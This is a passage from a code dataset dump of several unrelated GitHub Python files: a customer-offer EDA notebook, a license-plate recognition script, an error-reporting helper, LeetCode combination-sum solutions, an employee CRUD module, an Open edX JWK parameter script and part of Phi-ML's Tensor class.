reward | reward given for completing an offer |\n# | duration | time for offer to be open, in days |\n# | channels | email, web, mobile |\n\n# In[61]:\n\n\nportfolio\n\n\n# In[62]:\n\n\nportfolio.info()\n\n\n# In[63]:\n\n\nportfolio.describe().round(1)\n\n\n# In[64]:\n\n\nfig, ax = plt.subplots(figsize=(12,7))\nportfolio.hist(ax=ax)\nplt.show()\n\n\n# In[65]:\n\n\nportfolio.describe(include='O')\n\n\n# In[66]:\n\n\nportfolio.channels.astype('str').value_counts().plot(kind='barh');\n\n\n# In[67]:\n\n\nportfolio.offer_type.value_counts().plot(kind='barh');\n\n\n# ## Transcript\n\n# In[68]:\n\n\ntranscript.head()\n\n\n# In[69]:\n\n\ntranscript.info()\n\n\n# In[70]:\n\n\ntranscript.describe().round(1).T\n\n\n# In[71]:\n\n\ntranscript.describe(include='O')\n\n\n# In[72]:\n\n\ntranscript.event.astype('str').value_counts().plot(kind='barh');\n\n\n# ## Profile\n\n# In[73]:\n\n\nprofile.head()\n\n\n# In[74]:\n\n\nprofile.info()\n\n\n# In[75]:\n\n\nprofile.describe().round(1)\n\n\n# In[76]:\n\n\nfig, ax = plt.subplots(figsize=(12,7))\nprofile.hist(ax=ax)\nplt.show()\n\n\n# In[77]:\n\n\nprofile.describe(include='O')\n\n\n# In[78]:\n\n\nprofile.gender.astype('str').value_counts(dropna=False).plot(kind='barh');\n\n\n# ## Cleaning the data and Feature Engineering\n# \n\n# In[79]:\n\n\ngroup_income = profile.groupby(['income', 'gender']).size().reset_index()\ngroup_income.columns = ['income', 'gender', 'count']\n\nsns.catplot(x=\"income\", y=\"count\", hue=\"gender\", data=group_income,\n kind=\"bar\", palette=\"muted\", height=5, aspect=12/5)\nplt.xlabel('Income per year')\nplt.ylabel('Count')\nplt.title('Age/Income Distribution')\nplt.savefig('./extras/images/income-age-dist-binned.png', dpi=fig.dpi)\n\n\n# In[80]:\n\n\nportfolio['web'] = portfolio['channels'].apply(lambda x: 1 if 'web' in x else 0)\nportfolio['email'] = portfolio['channels'].apply(lambda x: 1 if 'email' in x else 0)\nportfolio['mobile'] = portfolio['channels'].apply(lambda x: 1 if 'mobile' in x else 0)\nportfolio['social'] = portfolio['channels'].apply(lambda x: 1 if 'social' in x else 0)\n \n# apply one hot encoding to offer_type column\noffer_type = pd.get_dummies(portfolio['offer_type'])\n\n# drop the channels and offer_type column\nportfolio.drop(['channels', 'offer_type'], axis=1, inplace=True)\n\n# combine the portfolio and offer_type dataframe to form a cleaned dataframe\nportfolio = pd.concat([portfolio, offer_type], axis=1, sort=False)\n\n\n# In[81]:\n\n\nprofile['memberdays'] = datetime.datetime.today().date() - pd.to_datetime(profile['became_member_on'], format='%Y%m%d').dt.date\nprofile['memberdays'] = profile['memberdays'].dt.days\nprofile['income'] = profile['income'].fillna(0)\n\nprofile['gender'] = profile['gender'].fillna('X')\nprofile['gender'] = profile['gender'].map({'X':0,'O':1, 'M':2, 'F':3})\nincome_bins = [0, 20000, 35000, 50000, 60000, 70000, 90000, 100000, np.inf]\nlabels = [0,1,2,3,4,5,6,7]\nprofile['income'] = pd.cut(profile['income'], bins = income_bins, labels= labels, include_lowest=True)\n\n\n# In[82]:\n\n\n# Let's plot the sama data and see if this provide us with better insights\n\ngroup_income = profile.groupby(['income', 'gender']).size().reset_index()\ngroup_income.columns = ['income', 'gender', 'count']\n\nsns.catplot(x=\"income\", y=\"count\", hue=\"gender\", data=group_income,\n kind=\"bar\", palette=\"muted\", height=5, aspect=12/5)\nplt.xlabel('Income per year')\nplt.ylabel('Count')\nplt.title('Age/Income Distribution')\nplt.savefig('./extras/images/income-age-dist-binned.png', dpi=fig.dpi)\n\n\n# ## Joining the data\n\n# In[87]:\n\n\ntranscript = transcript[transcript.person != None]\n# extract ids for each offer\ntranscript['offer_id'] = transcript[transcript.event != 'transaction']['value'].apply(lambda x: \n dict(x).get('offer id') \n if dict(x).get('offer id') is not None \n else dict(x).get('offer_id') )\n\n# transaction offers does not have offer id, so we filter them out next\njoined_df = pd.merge(profile, transcript[transcript.event != 'transaction'], how='left', left_on=['id'], right_on=['person'])\njoined_df['event'] = joined_df['event'].map({'offer received': 0, 'offer viewed': 1, 'offer completed': 2})\n\n# rename column for ease of joining of dataframes\nportfolio.rename({'id':'offer_id'}, inplace=True, axis=1)\n\n# now all data can be joined together\ndf = pd.merge(joined_df, portfolio, how='inner', left_on=['offer_id'], right_on=['offer_id'])\ndf = df.drop(['person', 'value'], axis=1)\n\ndf.head()\n\n\n# ## Exploring correlations\n# \n# Correlation is used to find which values are closely related with each other.\n# Now let's describe how values are correlated with each ther. For simplicity - the size of the output dot will define the correlation (the bigger - the closer).\n\n# In[88]:\n\n\n#!mkdir images\ndef heatmap(x, y, size, figsize=(18,15), fig_name='temp.png'):\n fig, ax = plt.subplots(figsize=figsize)\n \n # Mapping from column names to integer coordinates\n x_labels = [v for v in sorted(x.unique())]\n y_labels = [v for v in sorted(y.unique())]\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)} \n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)} \n \n size_scale = 500\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=size * size_scale, # Vector of square sizes, proportional to size parameter\n marker='s' # Use square as scatterplot marker\n )\n \n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n fig.savefig(fig_name, dpi=fig.dpi)\n \noffer_specs = ['difficulty', 'duration', 'reward', 'web',\n 'email', 'mobile', 'social', 'bogo', 'discount', 'informational']\nuser_specs = ['age', 'became_member_on', 'gender', 'income', 'memberdays']\n\ncorr = df[offer_specs + user_specs + ['event']].corr()\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\ncorr.columns = ['x', 'y', 'event']\nheatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['event'].abs(),\n fig_name='./extras/images/heatmap-general.png'\n)\n\n\n# Correlation between features seems to be quite weak. However it can be noted that `bogo` is strongly related to `discount` and `reward` fields, while `mobile` channel is correlated with `difficulty` field. Which is quite expected.\n# \n# Now let's see more closely into columns of our interest and define if this should be cleaned or changed.\n\n# In[89]:\n\n\ncorr = df[['income', 'gender','event']].corr()\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\ncorr.columns = ['x', 'y', 'value']\nheatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['value'].abs(),\n figsize=(4,4),\n fig_name='./extras/images/heatmap-event.png'\n)\n\n\n# ## Building Recommendation matrix\n\n# At the moment data for each user has entries for each offer if it was received, viewed and responded to it.\n# To be able to give valid recommendations we leave only last user action on each offer (either viewed, responded or ignored).\n\n# In[ ]:\n\n\ndf[(df.id == '68be06ca386d4c31939f3a4f0e3dd783') & (df.offer_id == '2906b810c7d4411798c6938adc9daaa5')]\n\n\n# In[97]:\n\n\nusers = df['id'].unique()\noffers = df['offer_id'].unique()\nrecommendation_df = pd.DataFrame(columns=df.columns)\n\nrecommendation_df.head()\n\n\n# In[ ]:\n\n\nprint(\"Number of known users: \", len(users))\nprint(\"Number of created offers: \", len(offers))\n\n\n# In[98]:\n\n\nfor i, offer in enumerate(offers):\n for j, user in enumerate(users):\n offer_id_actions = df[(df.id == user) & (df.offer_id == offer)]\n # log progress \n if j % 5000 == 0:\n print('Processing offer %s for user with index: %s' % (i, j)) \n if len(offer_id_actions) > 1:\n # user viewed or resonded to offer\n if offer_id_actions[offer_id_actions.event == 2]['event'].empty == False:\n # user has not completed an offer\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 2])\n elif offer_id_actions[offer_id_actions.event == 1]['event'].empty == False:\n # user only viewed offer\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 1])\n else:\n # Offer could be de received multiple times but ignored\n #print(\"Filter length\", len())\n #print(\"No event were found in filtered data\\n:\", offer_id_actions)\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 0])\n else:\n # offer has been ignored\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 0])\n\n\n# In[99]:\n\n\nrecommendation_df.head()\n\n\n# In[100]:\n\n\nrecommendation_df['event'][10000:50000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# In[90]:\n\n\ngr = df.groupby(['id','offer_id'])\nuser_actions = pd.concat([gr.tail(1)]).reset_index(drop=True)\nuser_actions.head()\n\n\n# In[91]:\n\n\nuser_actions[user_actions.id == 'e12aeaf2d47d42479ea1c4ac3d8286c6']\n\n\n# In[92]:\n\n\nuser_actions['event'][0:1000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# Final users/offers datasets look pretty good, however we still not able to extract some actions perfomed by users, especially with filtering duplicates. This might be caused by the fact when offer was received twice.\n# \n# Let's filter them and explore once more.\n\n# In[93]:\n\n\nuser_actions.drop_duplicates(subset=['id', 'offer_id'], keep=False)\n\nuser_actions[user_actions.id == 'e12aeaf2d47d42479ea1c4ac3d8286c6' ]\n\n\n# In[94]:\n\n\nuser_actions['event'][0:1000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# Now the matrices look pretty similar and we are ready to build the Recommendation Engine.\n\n# In[101]:\n\n\nrecommendation_df.to_csv('./data/silver/userdata.csv', index=False)\n\n\n# In[102]:\n\n\nuser_actions.to_csv('./data/silver/useractions.csv', index=False)\n\n\n# If we look closely how event outcome is related to gender or income we can notice that correlation is quite weak, so other additional parameters should be definitely be taken into account.\n","repo_name":"sparsh-ai/reco-tut-sor","sub_path":"code/nbs/reco-tut-sor-t1-01-eda.py","file_name":"reco-tut-sor-t1-01-eda.py","file_ext":"py","file_size_in_byte":17379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21737879884","text":"# import argparse\nimport os\nimport sys\nfrom pathlib import Path\nimport numpy\nimport torch\n# import torch.backends.cudnn as cudnn\nfrom read_plate import ReadPlate\nimport cv2\nFILE = Path(__file__).resolve()\nROOT = FILE.parents[0] # YOLOv5 root directory\nif str(ROOT) not in sys.path:\n sys.path.append(str(ROOT)) # add ROOT to PATH\nROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative\n\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n\ndef DrawChinese(img, text, positive, fontSize=20, fontColor=(\n 255, 0, 0)): # args-(img:numpy.ndarray, text:中文文本, positive:位置, fontSize:字体大小默认20, fontColor:字体颜色默认绿色)\n cv2img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # cv2和PIL中颜色的hex码的储存顺序不同\n pilimg = Image.fromarray(cv2img)\n # PIL图片上打印汉字\n draw = ImageDraw.Draw(pilimg) # 图片上打印\n font = ImageFont.truetype(\"MSJHL.TTC\", fontSize, encoding=\"utf-8\") # 参数1:字体文件路径,参数2:字体大小\n draw.text(positive, text, fontColor, font=font) # 参数1:打印坐标,参数2:文本,参数3:字体颜色,参数4:字体格式\n cv2charimg = cv2.cvtColor(numpy.array(pilimg), cv2.COLOR_RGB2BGR) # PIL图片转cv2 图片\n return cv2charimg\n\nif __name__ == '__main__':\n import os\n\n class_name = ['main']\n root = r'D:\\zcd\\CV\\3'\n \n read_plate = ReadPlate()\n count = 0\n\n for image_name in os.listdir(root):\n image_path = f'{root}/{image_name}'\n image = cv2.imread(image_path)\n \n plates = []\n result=read_plate(image)\n if result:\n plate_name, (x11, y11, x22, y22) = result[0]\n \n x11, y11, x22, y22 = int(x11), int(y11), int(x22), int(y22)\n image = cv2.rectangle(image, (x11 - 5, y11 - 5), (x22 + 5, y22 + 5), (0, 0, 255), 2)\n image = DrawChinese(image, plate_name, (x11, y22), 160)\n print(image_name)\n cv2.imwrite(r'D:\\zcd\\CV\\LicensePlate-master\\3'+'/'+image_name,image)\n","repo_name":"eternity123-null/LicenseRecognition","sub_path":"ResNet-LPRNet/LicenseRec.py","file_name":"LicenseRec.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7996402174","text":"import inspect\nfrom mftoolbox.constants import Color as c\n\ndef error_stack(error, message):\n \"\"\"\n Imprime mensagem de erro criada pelo usuário\n Args:\n context: contexto onde o erro foi gerado\n error: nome do erro\n message: mensagem explicativa do erro\n\n Returns: apenas imprime o tipo de erro, a mensagem explicativa e a lista de chamadas\n\n \"\"\"\n context = inspect.getframeinfo(inspect.currentframe(), context=1), inspect.getouterframes(inspect.currentframe(),context=1)\n error = \"Erro: \" + error\n print(c.dark_red_background + c.bold + c.white + error + \" \" * (60 - len(error)) + c.end)\n print(message)\n print('Lista de chamadas:')\n last = False\n for id1, item1 in enumerate(context[1]):\n if last:\n break\n item2 = item1[0]\n filename, lineno, function, code_context, code = inspect.getframeinfo(item2)\n if function == \"\":\n last = True\n if function not in ('get_context', '__init__', 'error_stack'):\n function = function.replace(\"\", \"__main__\")\n print(\"file: {}, line: {}, function: {}\".format(filename, lineno, function))\n exit(1)\n\nclass RaiseError(Exception):\n \"\"\"\n Levanta um erro definido pelo usuário\n \"\"\"\n\n def __init__(self, RaisedError, message):\n \"\"\"\n\n Args:\n RaisedError: Nome do erro\n message: mensagem explicativa do erro\n \"\"\"\n error_stack(RaisedError, message)","repo_name":"Jeffkent01coder/trackphone","sub_path":"venv/lib/python3.8/site-packages/mftoolbox/raiseerror.py","file_name":"raiseerror.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"11640615109","text":"\"\"\"\nLeetcode 40: Combination Sum II\nhttps://leetcode.com/problems/combination-sum-ii/\nApproach: Backtracking\n- Use a helper function to backtrack the possible combinations\n- The helper function takes in the index of the candidate to be considered\n and the current combination\n- For each candidate, we have 2 choices: either we use it or we don't\n- If we use it, we add it to the current combination and subtract it from\n the target. Then we recursively call the helper function with the next\n index and the new target, i.e. we don't consider the same candidate again\n- Due to the duplicates in the candidates, we need to skip the duplicates\n when we are considering the same candidate again\nAnalysis:\n- Time complexity: O(2^n) - n is the number of candidates\n- Space complexity: O(n)\n\"\"\"\nfrom typing import List\n\n\ndef combinationSum2(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\" Recursive solution \"\"\"\n res = []\n candidates.sort()\n\n def backtrack(index, combination, target):\n if target == 0:\n res.append(combination.copy())\n return\n if target < 0 or index >= len(candidates):\n return\n\n candidate = candidates[index]\n\n next_target = target - candidate\n combination.append(candidate)\n backtrack(index + 1, combination, next_target)\n combination.pop()\n i = index + 1\n while i < len(candidates) and candidates[i] == candidates[index]:\n i += 1\n backtrack(i, combination, target)\n backtrack(0, [], target)\n return res\n\n\ndef combinationSum2Iterative(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\" Iterative solution \"\"\"\n res = []\n candidates.sort()\n\n def backtrack(index, combination, target):\n if target == 0:\n res.append(combination)\n return\n if target < 0 or index >= len(candidates):\n return\n prev = -1\n for i in range(index, len(candidates)):\n candidate = candidates[i]\n if candidate == prev:\n continue\n if candidate <= target:\n backtrack(i + 1, combination + [candidate], target - candidate)\n prev = candidate\n backtrack(0, [], target)\n","repo_name":"ngugimuchangi/coding_challenges","sub_path":"leetcode/backtracking/combination_sum_ii.py","file_name":"combination_sum_ii.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34920275922","text":"\"\"\" CRUD operations for management of resources\n\"\"\"\nfrom sqlalchemy.orm import Session\nfrom models import Employee\nimport schemas\n\n\ndef get_employee(db_session: Session, employee_idir: str):\n \"\"\" Get employee by idir \"\"\"\n return db_session.query(Employee).filter(Employee.idir == employee_idir).first()\n\n\ndef get_employee_by_idir(db_session: Session, employee_idir: str):\n \"\"\" Get employee by idir \"\"\"\n return db_session.query(Employee).filter(Employee.idir == employee_idir).first()\n\n\ndef get_employees(db_session: Session):\n \"\"\" Get all employees \"\"\"\n list_of_emps = []\n list_of_records = db_session.query(Employee).all()\n for recd in list_of_records:\n emp = schemas.Employee(\n id=recd.id,\n idir=recd.idir,\n status=recd.status,\n location=recd.location,\n phone=recd.phone)\n list_of_emps.append(emp)\n return list_of_emps\n\n\ndef create_employee(db_session: Session, employee: schemas.EmployeeRequest):\n \"\"\" Create new employee \"\"\"\n new_employee = Employee(\n idir=employee.idir,\n status=employee.status,\n location=employee.location,\n phone=employee.phone)\n db_session.add(new_employee)\n db_session.commit()\n db_session.refresh(new_employee)\n return db_session.query(Employee).filter(Employee.idir == employee.idir).first()\n\n\ndef delete_employee(db_session: Session, employee_idir: str):\n \"\"\" Delete employee by idir \"\"\"\n db_session.query(Employee).filter(Employee.idir == employee_idir).delete()\n db_session.commit()\n return employee_idir\n\n\ndef update_employee(db_session: Session, employee: schemas.EmployeeRequest):\n \"\"\" Update employee by idir \"\"\"\n db_session.query(Employee).filter(Employee.idir == employee.idir).update(\n {\n Employee.status: employee.status,\n Employee.location: employee.location,\n Employee.phone: employee.phone\n }, synchronize_session=False)\n db_session.commit()\n return db_session.query(Employee).filter(Employee.idir == employee.idir).first()\n","repo_name":"bcgov/epr","sub_path":"api/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"24592238810","text":"#!/usr/bin/env python3\n\"\"\"Derivates\"\"\"\n\n\ndef poly_derivative(poly):\n \"\"\"Returns the derivative of the given poly \"\"\"\n if type(poly) is not list or len(poly) == 0:\n return None\n derivate = []\n for i in range(len(poly)):\n if i >= 1:\n derivate.append(poly[i] * i)\n if len(derivate) == 0:\n derivate.append(0)\n return derivate\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"math/0x02-calculus/10-matisse.py","file_name":"10-matisse.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"12617467093","text":"#!/usr/bin/env python3\n# Enhance a JWK to have all of its optional performance parameters.\n# Intended to be used on an RSA `JWT_PRIVATE_SIGNING_JWK`.\n#\n# This is needed for the change from pyjwkest to PyJWT, since the\n# former accepts a partial list of optional parameters but the latter\n# requires that they are either all present or all absent. The optional\n# parameters provide a performance boost.\n#\n# Usage: Key JSON accepted on stdin; enhanced key printed to stdout.\n\nimport json\nimport sys\n\nfrom jwt.algorithms import RSAAlgorithm\n\n\nprint(\"Paste the key's JSON, followed by a new line and Ctrl-D:\\n\", file=sys.stderr)\nold_jwk_data = json.loads(sys.stdin.read())\n\n# Clear out all of the precomputed private numbers\nfor param_key in ['p', 'q', 'dp', 'dq', 'qi']:\n if param_key in old_jwk_data:\n del old_jwk_data[param_key]\n\n# Ensure that there aren't any unexpected parameters\nexpected_remaining = {'kty', 'e', 'd', 'n', 'kid', 'key_ops'}\nunexpected_params = set(old_jwk_data.keys()) - expected_remaining\nif len(unexpected_params):\n print(\n f\"Unexpected parameters {unexpected_params} would be lost. Aborting script. \"\n \"If your key has additional parameters that are unrelated to the precomputed \"\n \"private numbers, then please add them to the `expected_remaining` variable \"\n \"and re-run the script. Please consider making a PR as well.\",\n file=sys.stderr\n )\n sys.exit(1)\n\n# Recompute private numbers\nnew_jwk_data = json.loads(RSAAlgorithm.to_jwk(RSAAlgorithm.from_jwk(old_jwk_data)))\n\n# Restore the kid (key ID) param, which gets lost in the process. This adds it\n# to the front of the dict. The params are actually in a really nice order in\n# the native ordering that comes out of the JWK, with metadata first, then the\n# core params (n, e, d), and then the precomputed values.\nfor restore_param in ['kid']:\n if restore_param in old_jwk_data:\n new_jwk_data = {restore_param: old_jwk_data[restore_param], **new_jwk_data}\n\n# Pretty-print so that the kid and modulus can be confirmed easily\nprint(\"\\n\\nEnhanced private key:\\n\", file=sys.stderr)\nprint(json.dumps(new_jwk_data, indent=4))\n","repo_name":"openedx/edx-platform","sub_path":"scripts/jwk-precompute-params.py","file_name":"jwk-precompute-params.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"30366614327","text":"import numbers\nimport warnings\nfrom contextlib import contextmanager\nfrom typing import Union, TypeVar\n\nfrom dataclasses import dataclass\nfrom typing import Tuple, Callable, List\n\nimport numpy\nimport numpy as np\n\nfrom ._magic_ops import PhiTreeNodeType, variable_attributes, copy_with, stack, pack_dims, expand\nfrom ._shape import (Shape,\n CHANNEL_DIM, BATCH_DIM, SPATIAL_DIM, EMPTY_SHAPE,\n parse_dim_order, shape_stack, merge_shapes, channel, concat_shapes, primal,\n SUPERSCRIPT, IncompatibleShapes, INSTANCE_DIM, batch, spatial, dual, instance, shape, DimFilter, non_batch, DEBUG_CHECKS)\nfrom ..backend import NoBackendFound, choose_backend, BACKENDS, get_precision, default_backend, convert as convert_, \\\n Backend, ComputeDevice, OBJECTS\nfrom ..backend._dtype import DType, combine_types\nfrom .magic import BoundDim, PhiTreeNode, slicing_dict\nfrom .magic import Shapable\n\n\nclass Tensor:\n \"\"\"\n Abstract base class to represent structured data of one data type.\n This class replaces the native tensor classes `numpy.ndarray`, `torch.Tensor`, `tensorflow.Tensor` or `jax.numpy.ndarray` as the main data container in Φ-ML.\n\n `Tensor` instances are different from native tensors in two important ways:\n\n * The dimensions of Tensors have *names* and *types*.\n * Tensors can have non-uniform shapes, meaning that the size of dimensions can vary along other dimensions.\n\n To check whether a value is a tensor, use `isinstance(value, Tensor)`.\n\n To construct a Tensor, use `phiml.math.tensor()`, `phiml.math.wrap()` or one of the basic tensor creation functions,\n see https://tum-pbs.github.io/PhiML/Math.html#tensor-creation .\n\n Tensors are not editable.\n When backed by an editable native tensor, e.g. a `numpy.ndarray`, do not edit the underlying data structure.\n \"\"\"\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n \"\"\"\n Returns a native tensor object with the dimensions ordered according to `order`.\n \n Transposes the underlying tensor to match the name order and adds singleton dimensions for new dimension names.\n If a dimension of the tensor is not listed in `order`, a `ValueError` is raised.\n\n Args:\n order: (Optional) Order of dimension names as comma-separated string, list or `Shape`.\n singleton_for_const: If `True`, dimensions along which values are guaranteed to be constant will not be expanded to their true size but returned as singleton dimensions.\n\n Returns:\n Native tensor representation, such as PyTorch tensor or NumPy array.\n\n Raises:\n ValueError if the tensor cannot be transposed to match target_shape\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def numpy(self, order: Union[str, tuple, list, Shape] = None) -> np.ndarray:\n \"\"\"\n Converts this tensor to a `numpy.ndarray` with dimensions ordered according to `order`.\n \n *Note*: Using this function breaks the autograd chain. The returned tensor is not differentiable.\n To get a differentiable tensor, use `Tensor.native()` instead.\n \n Transposes the underlying tensor to match the name order and adds singleton dimensions for new dimension names.\n If a dimension of the tensor is not listed in `order`, a `ValueError` is raised.\n\n If this `Tensor` is backed by a NumPy array, a reference to this array may be returned.\n\n See Also:\n `phiml.math.numpy()`\n\n Args:\n order: (Optional) Order of dimension names as comma-separated string, list or `Shape`.\n\n Returns:\n NumPy representation\n\n Raises:\n ValueError if the tensor cannot be transposed to match target_shape\n \"\"\"\n native = self.native(order=order)\n return choose_backend(native).numpy(native)\n\n def __array__(self, dtype=None): # NumPy conversion\n if self.rank > 1:\n warnings.warn(\"Automatic conversion of Φ-ML tensors to NumPy can cause problems because the dimension order is not guaranteed.\", SyntaxWarning, stacklevel=3)\n return self.numpy(self._shape)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs): # NumPy interface\n if len(inputs) != 2:\n return NotImplemented\n if ufunc.__name__ == 'multiply':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x * y, lambda x, y: choose_backend(x, y).mul(x, y), 'mul', '*')\n else:\n return self._op2(inputs[0], lambda x, y: y * x, lambda x, y: choose_backend(x, y).mul(y, x), 'rmul', '*')\n if ufunc.__name__ == 'add':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x + y, lambda x, y: choose_backend(x, y).add(x, y), 'add', '+')\n else:\n return self._op2(inputs[0], lambda x, y: y + x, lambda x, y: choose_backend(x, y).add(y, x), 'radd', '+')\n if ufunc.__name__ == 'subtract':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x - y, lambda x, y: choose_backend(x, y).sub(x, y), 'add', '-')\n else:\n return self._op2(inputs[0], lambda x, y: y - x, lambda x, y: choose_backend(x, y).sub(y, x), 'rsub', '-')\n if ufunc.__name__ in ['divide', 'true_divide']:\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x / y, lambda x, y: choose_backend(x, y).div(x, y), 'true_divide', '/')\n else:\n return self._op2(inputs[0], lambda x, y: y / x, lambda x, y: choose_backend(x, y).div(y, x), 'r_true_divide', '/')\n if ufunc.__name__ == 'floor_divide':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x // y, lambda x, y: choose_backend(x, y).floordiv(x, y), 'floor_divide', '//')\n else:\n return self._op2(inputs[0], lambda x, y: y // x, lambda x, y: choose_backend(x, y).floordiv(y, x), 'r_floor_divide', '//')\n if ufunc.__name__ == 'remainder':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x % y, lambda x, y: choose_backend(x, y).mod(x, y), 'remainder', '%')\n else:\n return self._op2(inputs[0], lambda x, y: y % x, lambda x, y: choose_backend(x, y).mod(y, x), 'r_remainder', '%')\n if ufunc.__name__ == 'power':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x ** y, lambda x, y: choose_backend(x, y).pow(x, y), 'power', '**')\n else:\n return self._op2(inputs[0], lambda x, y: y ** x, lambda x, y: choose_backend(x, y).pow(y, x), 'r_power', '**')\n if ufunc.__name__ == 'equal':\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(inputs[0] is inputs[1])\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(inputs[0].shape) != set(inputs[1].shape):\n return wrap(False)\n from ._ops import close\n return wrap(close(inputs[0], inputs[1], rel_tolerance=0, abs_tolerance=0))\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x == y, lambda x, y: choose_backend(x, y).equal(x, y), 'equal', '==')\n else:\n return self._op2(inputs[0], lambda x, y: y == x, lambda x, y: choose_backend(x, y).equal(y, x), 'r_equal', '==')\n if ufunc.__name__ == 'not_equal':\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(inputs[0] is not inputs[1])\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(inputs[0].shape) != set(inputs[1].shape):\n return wrap(True)\n from ._ops import close\n return wrap(not close(inputs[0], inputs[1], rel_tolerance=0, abs_tolerance=0))\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x != y, lambda x, y: choose_backend(x, y).not_equal(x, y), 'equal', '!=')\n else:\n return self._op2(inputs[0], lambda x, y: y != x, lambda x, y: choose_backend(x, y).not_equal(y, x), 'r_equal', '!=')\n if ufunc.__name__ == 'greater':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x > y, lambda x, y: choose_backend(x, y).greater_than(x, y), 'greater', '>')\n else:\n return self._op2(inputs[0], lambda x, y: y > x, lambda x, y: choose_backend(x, y).greater_than(y, x), 'r_greater', '>')\n if ufunc.__name__ == 'greater_equal':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x >= y, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'greater_equal', '>=')\n else:\n return self._op2(inputs[0], lambda x, y: y >= x, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'r_greater_equal', '>=')\n if ufunc.__name__ == 'less':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x < y, lambda x, y: choose_backend(x, y).greater_than(y, x), 'less', '<')\n else:\n return self._op2(inputs[0], lambda x, y: y < x, lambda x, y: choose_backend(x, y).greater_than(x, y), 'r_less', '<')\n if ufunc.__name__ == 'less_equal':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x <= y, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'less_equal', '<=')\n else:\n return self._op2(inputs[0], lambda x, y: y <= x, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'r_less_equal', '<=')\n if ufunc.__name__ == 'left_shift':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x << y, lambda x, y: choose_backend(x, y).shift_bits_left(x, y), 'left_shift', '<<')\n else:\n return self._op2(inputs[0], lambda x, y: y << x, lambda x, y: choose_backend(x, y).shift_bits_left(y, x), 'r_left_shift', '<<')\n if ufunc.__name__ == 'right_shift':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x >> y, lambda x, y: choose_backend(x, y).shift_bits_right(x, y), 'right_shift', '>>')\n else:\n return self._op2(inputs[0], lambda x, y: y >> x, lambda x, y: choose_backend(x, y).shift_bits_right(y, x), 'r_right_shift', '>>')\n raise NotImplementedError(f\"NumPy function '{ufunc.__name__}' is not compatible with Φ-ML tensors.\")\n\n @property\n def dtype(self) -> 